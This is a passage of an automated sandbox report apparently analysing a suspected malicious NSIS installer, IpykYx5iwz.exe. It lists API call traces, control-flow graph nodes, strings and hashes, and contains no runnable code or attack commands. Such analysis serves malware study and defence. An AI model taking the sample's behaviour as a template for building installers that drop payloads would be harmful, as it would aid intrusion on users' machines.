                                                  • SetErrorMode.KERNELBASE ref: 004033A9
                                                  • GetVersion.KERNEL32 ref: 004033AF
                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033E2
                                                  • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040341E
                                                  • OleInitialize.OLE32(00000000), ref: 00403425
                                                  • SHGetFileInfoA.SHELL32(0041FCF0,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 00403441
                                                  • GetCommandLineA.KERNEL32(00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 00403456
                                                  • CharNextA.USER32(00000000,"C:\Users\user\Desktop\IpykYx5iwz.exe",00000020,"C:\Users\user\Desktop\IpykYx5iwz.exe",00000000,?,00000006,00000008,0000000A), ref: 00403492
                                                  • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 0040358F
                                                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035A0
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035AC
                                                  • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035C0
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035C8
                                                  • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035D9
                                                  • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035E1
                                                  • DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 004035F5
                                                    • Part of subcall function 004064D9: GetModuleHandleA.KERNEL32(?,?,?,004033F7,0000000A), ref: 004064EB
                                                    • Part of subcall function 004064D9: GetProcAddress.KERNEL32(00000000,?), ref: 00406506
                                                    • Part of subcall function 0040395E: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness,1033,helsidesannoncen: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,helsidesannoncen: Installing,00000000,00000002,74DF3410), ref: 00403A4E
                                                    • Part of subcall function 0040395E: lstrcmpiA.KERNEL32(?,.exe), ref: 00403A61
                                                    • Part of subcall function 0040395E: GetFileAttributesA.KERNEL32(Call), ref: 00403A6C
                                                    • Part of subcall function 0040395E: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness), ref: 00403AB5
                                                    • Part of subcall function 0040395E: RegisterClassA.USER32(00423EC0), ref: 00403AF2
                                                    • Part of subcall function 0040386C: CloseHandle.KERNEL32(000002E8,C:\Users\user\AppData\Local\Temp\,004036A3,?,?,00000006,00000008,0000000A), ref: 0040387E
                                                    • Part of subcall function 0040386C: CloseHandle.KERNEL32(000002E4,C:\Users\user\AppData\Local\Temp\,004036A3,?,?,00000006,00000008,0000000A), ref: 00403892
                                                  • OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 004036A3
                                                  • ExitProcess.KERNEL32 ref: 004036C4
                                                  • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 004037E1
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 004037E8
                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403800
                                                  • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 0040381F
                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403843
                                                  • ExitProcess.KERNEL32 ref: 00403866
                                                    • Part of subcall function 0040585D: MessageBoxIndirectA.USER32(0040A230), ref: 004058B8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: Process$ExitFileHandle$CloseEnvironmentPathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                  • String ID: "$"C:\Users\user\Desktop\IpykYx5iwz.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness$C:\Users\user\Desktop$C:\Users\user\Desktop\IpykYx5iwz.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                  • API String ID: 538718688-1556085645
                                                  • Opcode ID: 3feae3c0fb12c0108577558b9e2af0d6e6bea89c0727ed28e9d7b979ac67a625
                                                  • Instruction ID: 4384c8e2b939b42067d375ed445cc130ba198a6ce93f9d773e0a7c2deed02dc2
                                                  • Opcode Fuzzy Hash: 3feae3c0fb12c0108577558b9e2af0d6e6bea89c0727ed28e9d7b979ac67a625
                                                  • Instruction Fuzzy Hash: 98C108706047506AD721AF75AD49B2B3EACEF81306F05443FF591BA1E2CB7C8A15872E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 134 4053a6-4053c2 135 405551-405557 134->135 136 4053c8-40548f GetDlgItem * 3 call 404204 call 404af5 GetClientRect GetSystemMetrics SendMessageA * 2 134->136 138 405581-40558d 135->138 139 405559-40557b GetDlgItem CreateThread CloseHandle 135->139 158 405491-4054ab SendMessageA * 2 136->158 159 4054ad-4054b0 136->159 141 4055af-4055b5 138->141 142 40558f-405595 138->142 139->138 146 4055b7-4055bd 141->146 147 40560a-40560d 141->147 144 4055d0-4055d7 call 404236 142->144 145 405597-4055aa ShowWindow * 2 call 404204 142->145 155 4055dc-4055e0 144->155 145->141 148 4055e3-4055f3 ShowWindow 146->148 149 4055bf-4055cb call 4041a8 146->149 147->144 152 40560f-405615 147->152 156 405603-405605 call 4041a8 148->156 157 4055f5-4055fe call 405268 148->157 149->144 152->144 160 405617-40562a SendMessageA 152->160 156->147 157->156 158->159 163 4054c0-4054d7 call 4041cf 159->163 164 4054b2-4054be SendMessageA 159->164 165 405630-40565c CreatePopupMenu call 406163 AppendMenuA 160->165 166 405727-405729 160->166 173 4054d9-4054ed ShowWindow 163->173 174 40550d-40552e GetDlgItem SendMessageA 163->174 164->163 171 405671-405687 TrackPopupMenu 165->171 172 40565e-40566e GetWindowRect 165->172 166->155 171->166 175 40568d-4056a7 171->175 172->171 176 4054fc 173->176 177 4054ef-4054fa ShowWindow 173->177 174->166 178 405534-40554c SendMessageA * 2 174->178 179 4056ac-4056c7 SendMessageA 175->179 180 405502-405508 call 404204 176->180 177->180 178->166 179->179 181 4056c9-4056e9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 179->181 180->174 183 4056eb-40570b SendMessageA 181->183 183->183 184 40570d-405721 GlobalUnlock SetClipboardData CloseClipboard 183->184 184->166
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000403), ref: 00405405
                                                  • GetDlgItem.USER32(?,000003EE), ref: 00405414
                                                  • GetClientRect.USER32(?,?), ref: 00405451
                                                  • GetSystemMetrics.USER32(00000002), ref: 00405458
                                                  • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405479
                                                  • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040548A
                                                  • SendMessageA.USER32(?,00001001,00000000,?), ref: 0040549D
                                                  • SendMessageA.USER32(?,00001026,00000000,?), ref: 004054AB
                                                  • SendMessageA.USER32(?,00001024,00000000,?), ref: 004054BE
                                                  • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004054E0
                                                  • ShowWindow.USER32(?,00000008), ref: 004054F4
                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405515
                                                  • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405525
                                                  • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040553E
                                                  • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040554A
                                                  • GetDlgItem.USER32(?,000003F8), ref: 00405423
                                                    • Part of subcall function 00404204: SendMessageA.USER32(00000028,?,00000001,00404034), ref: 00404212
                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405566
                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_0000533A,00000000), ref: 00405574
                                                  • CloseHandle.KERNELBASE(00000000), ref: 0040557B
                                                  • ShowWindow.USER32(00000000), ref: 0040559E
                                                  • ShowWindow.USER32(?,00000008), ref: 004055A5
                                                  • ShowWindow.USER32(00000008), ref: 004055EB
                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040561F
                                                  • CreatePopupMenu.USER32 ref: 00405630
                                                  • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405645
                                                  • GetWindowRect.USER32(?,000000FF), ref: 00405665
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040567E
                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004056BA
                                                  • OpenClipboard.USER32(00000000), ref: 004056CA
                                                  • EmptyClipboard.USER32 ref: 004056D0
                                                  • GlobalAlloc.KERNEL32(00000042,?), ref: 004056D9
                                                  • GlobalLock.KERNEL32(00000000), ref: 004056E3
                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004056F7
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405710
                                                  • SetClipboardData.USER32(00000001,00000000), ref: 0040571B
                                                  • CloseClipboard.USER32 ref: 00405721
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                  • String ID: 0B
                                                  • API String ID: 590372296-4132856435
                                                  • Opcode ID: d3dd3b0b3ca7bb124b3b0ac17d5403135303b194bd715731b282269866f889a6
                                                  • Instruction ID: 3d4d3d9973c8e241304b7258fdbe4eb8662a2ffc95f0db4602c58cf82c677d54
                                                  • Opcode Fuzzy Hash: d3dd3b0b3ca7bb124b3b0ac17d5403135303b194bd715731b282269866f889a6
                                                  • Instruction Fuzzy Hash: 74A16A71900608BFDB119FA4DE89AAE7B79FB48355F00403AFA44B61A0CB754E51DF68

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 499 405909-40592f call 405bc7 502 405931-405943 DeleteFileA 499->502 503 405948-40594f 499->503 504 405ad2-405ad6 502->504 505 405951-405953 503->505 506 405962-405972 call 406141 503->506 507 405a80-405a85 505->507 508 405959-40595c 505->508 514 405981-405982 call 405b20 506->514 515 405974-40597f lstrcatA 506->515 507->504 510 405a87-405a8a 507->510 508->506 508->507 512 405a94-405a9c call 406444 510->512 513 405a8c-405a92 510->513 512->504 523 405a9e-405ab2 call 405ad9 call 4058c1 512->523 513->504 517 405987-40598a 514->517 515->517 519 405995-40599b lstrcatA 517->519 520 40598c-405993 517->520 522 4059a0-4059be lstrlenA FindFirstFileA 519->522 520->519 520->522 524 4059c4-4059db call 405b04 522->524 525 405a76-405a7a 522->525 538 405ab4-405ab7 523->538 539 405aca-405acd call 405268 523->539 532 4059e6-4059e9 524->532 533 4059dd-4059e1 524->533 525->507 527 405a7c 525->527 527->507 536 4059eb-4059f0 532->536 537 4059fc-405a0a call 406141 532->537 533->532 535 4059e3 533->535 535->532 541 4059f2-4059f4 536->541 542 405a55-405a67 FindNextFileA 536->542 550 405a21-405a2c call 4058c1 537->550 551 405a0c-405a14 537->551 538->513 544 405ab9-405ac8 call 405268 call 405f20 538->544 539->504 541->537 547 4059f6-4059fa 541->547 542->524 545 405a6d-405a70 FindClose 542->545 544->504 545->525 547->537 547->542 559 405a4d-405a50 call 405268 550->559 560 405a2e-405a31 550->560 551->542 552 405a16-405a1f call 405909 551->552 552->542 559->542 561 405a33-405a43 call 405268 call 405f20 560->561 562 405a45-405a4b 560->562 561->542 562->542
                                                  APIs
                                                  • DeleteFileA.KERNELBASE(?,?,74DF3410,74DF2EE0,00000000), ref: 00405932
                                                  • lstrcatA.KERNEL32(00421D38,\*.*,00421D38,?,?,74DF3410,74DF2EE0,00000000), ref: 0040597A
                                                  • lstrcatA.KERNEL32(?,0040A014,?,00421D38,?,?,74DF3410,74DF2EE0,00000000), ref: 0040599B
                                                  • lstrlenA.KERNEL32(?,?,0040A014,?,00421D38,?,?,74DF3410,74DF2EE0,00000000), ref: 004059A1
                                                  • FindFirstFileA.KERNEL32(00421D38,?,?,?,0040A014,?,00421D38,?,?,74DF3410,74DF2EE0,00000000), ref: 004059B2
                                                  • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405A5F
                                                  • FindClose.KERNEL32(00000000), ref: 00405A70
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: "C:\Users\user\Desktop\IpykYx5iwz.exe"$\*.*
                                                  • API String ID: 2035342205-4079090417
                                                  • Opcode ID: c1155a3e0eef8dedcafff871b2087de7bed2f6f65f563fd344c81ee0292e8e18
                                                  • Instruction ID: 27aaa2d61bcc81dbc7fe7a1ecb0f7f08d06d16e834bef461c94bc9154c43beac
                                                  • Opcode Fuzzy Hash: c1155a3e0eef8dedcafff871b2087de7bed2f6f65f563fd344c81ee0292e8e18
                                                  • Instruction Fuzzy Hash: 9651B271A04A04AACB21AB618C89BBF7BB8DF42724F14427BF451751D2D73C4982DE6E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3d7b46422ea3febcc3dfec7e4f4e14f5e1a14e9fd76d5679f282581756d1a8c3
                                                  • Instruction ID: 7a1e34af05216305e42a36fadcfa131d67e9d7ad70080566c8310abef1b5d03e
                                                  • Opcode Fuzzy Hash: 3d7b46422ea3febcc3dfec7e4f4e14f5e1a14e9fd76d5679f282581756d1a8c3
                                                  • Instruction Fuzzy Hash: 2CF18571D00229CBCF28CFA8C8946ADBBB1FF45305F25816ED856BB281D7785A86CF45
                                                  APIs
                                                  • FindFirstFileA.KERNELBASE(74DF3410,00422580,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,00405C0A,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,74DF3410,?,74DF2EE0,00405929,?,74DF3410,74DF2EE0), ref: 0040644F
                                                  • FindClose.KERNEL32(00000000), ref: 0040645B
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\nsz7B51.tmp, xrefs: 00406444
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp
                                                  • API String ID: 2295610775-2847000489
                                                  • Opcode ID: ae89da06e440076b4ef4d4033fa26a2f04ee7ca33b7c5982e125569f5bb31e91
                                                  • Instruction ID: 995bcf95c96f44528e39145dd6954a6c4b3f49c7588164c04ee36f3ae4bc57a9
                                                  • Opcode Fuzzy Hash: ae89da06e440076b4ef4d4033fa26a2f04ee7ca33b7c5982e125569f5bb31e91
                                                  • Instruction Fuzzy Hash: B3D012715050206BC34017786E0C84B7A589F15330761CB36F4AAF11E0D7748C628A9E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 185 403cfb-403d0d 186 403d13-403d19 185->186 187 403e4e-403e5d 185->187 186->187 188 403d1f-403d28 186->188 189 403eac-403ec1 187->189 190 403e5f-403ea7 GetDlgItem * 2 call 4041cf SetClassLongA call 40140b 187->190 193 403d2a-403d37 SetWindowPos 188->193 194 403d3d-403d40 188->194 191 403f01-403f06 call 40421b 189->191 192 403ec3-403ec6 189->192 190->189 207 403f0b-403f26 191->207 196 403ec8-403ed3 call 401389 192->196 197 403ef9-403efb 192->197 193->194 199 403d42-403d54 ShowWindow 194->199 200 403d5a-403d60 194->200 196->197 218 403ed5-403ef4 SendMessageA 196->218 197->191 206 40419c 197->206 199->200 202 403d62-403d77 DestroyWindow 200->202 203 403d7c-403d7f 200->203 208 404179-40417f 202->208 211 403d81-403d8d SetWindowLongA 203->211 212 403d92-403d98 203->212 210 40419e-4041a5 206->210 214 403f28-403f2a call 40140b 207->214 215 403f2f-403f35 207->215 208->206 220 404181-404187 208->220 211->210 216 403e3b-403e49 call 404236 212->216 217 403d9e-403daf GetDlgItem 212->217 214->215 221 40415a-404173 DestroyWindow EndDialog 215->221 222 403f3b-403f46 215->222 216->210 224 403db1-403dc8 SendMessageA IsWindowEnabled 217->224 225 403dce-403dd1 217->225 218->210 220->206 227 404189-404192 ShowWindow 220->227 221->208 222->221 223 403f4c-403f99 call 406163 call 4041cf * 3 GetDlgItem 222->223 255 403fa3-403fdf ShowWindow KiUserCallbackDispatcher call 4041f1 EnableWindow 223->255 256 403f9b-403fa0 223->256 224->206 224->225 229 403dd3-403dd4 225->229 230 403dd6-403dd9 225->230 227->206 233 403e04-403e09 call 4041a8 229->233 234 403de7-403dec 230->234 235 403ddb-403de1 230->235 233->216 238 403e22-403e35 SendMessageA 234->238 240 403dee-403df4 234->240 235->238 239 403de3-403de5 235->239 238->216 239->233 243 403df6-403dfc call 40140b 240->243 244 403e0b-403e14 call 40140b 240->244 251 403e02 243->251 244->216 253 403e16-403e20 244->253 251->233 253->251 259 403fe1-403fe2 255->259 260 403fe4 255->260 256->255 261 403fe6-404014 GetSystemMenu EnableMenuItem SendMessageA 259->261 260->261 262 404016-404027 SendMessageA 261->262 263 404029 261->263 264 40402f-404069 call 404204 call 403cdc call 406141 lstrlenA call 406163 SetWindowTextA call 401389 262->264 263->264 264->207 275 40406f-404071 264->275 275->207 276 404077-40407b 275->276 277 40409a-4040ae DestroyWindow 276->277 278 40407d-404083 276->278 277->208 280 4040b4-4040e1 CreateDialogParamA 277->280 278->206 279 404089-40408f 278->279 279->207 281 404095 279->281 280->208 282 4040e7-40413e call 4041cf GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 280->282 281->206 282->206 287 404140-404153 ShowWindow call 40421b 282->287 289 404158 287->289 289->208
                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D37
                                                  • ShowWindow.USER32(?), ref: 00403D54
                                                  • DestroyWindow.USER32 ref: 00403D68
                                                  • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403D84
                                                  • GetDlgItem.USER32(?,?), ref: 00403DA5
                                                  • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403DB9
                                                  • IsWindowEnabled.USER32(00000000), ref: 00403DC0
                                                  • GetDlgItem.USER32(?,00000001), ref: 00403E6E
                                                  • GetDlgItem.USER32(?,00000002), ref: 00403E78
                                                  • SetClassLongA.USER32(?,000000F2,?), ref: 00403E92
                                                  • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403EE3
                                                  • GetDlgItem.USER32(?,00000003), ref: 00403F89
                                                  • ShowWindow.USER32(00000000,?), ref: 00403FAA
                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FBC
                                                  • EnableWindow.USER32(?,?), ref: 00403FD7
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FED
                                                  • EnableMenuItem.USER32(00000000), ref: 00403FF4
                                                  • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 0040400C
                                                  • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 0040401F
                                                  • lstrlenA.KERNEL32(helsidesannoncen: Installing,?,helsidesannoncen: Installing,00000000), ref: 00404049
                                                  • SetWindowTextA.USER32(?,helsidesannoncen: Installing), ref: 00404058
                                                  • ShowWindow.USER32(?,0000000A), ref: 0040418C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                  • String ID: helsidesannoncen: Installing
                                                  • API String ID: 3282139019-1051793922
                                                  • Opcode ID: 41b4c3bc07c357cb4355c5985bfedf11a5f104bf667dfc02683d01159c74e76c
                                                  • Instruction ID: 7396c87bec48d1de0b65d229f3995359e9ede5a691df1363d58f31033cac92c3
                                                  • Opcode Fuzzy Hash: 41b4c3bc07c357cb4355c5985bfedf11a5f104bf667dfc02683d01159c74e76c
                                                  • Instruction Fuzzy Hash: B3C122B1600301EBCB216F61ED89E2B3AB8FB85306F51053EF651B51F1CB7999829B1D

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
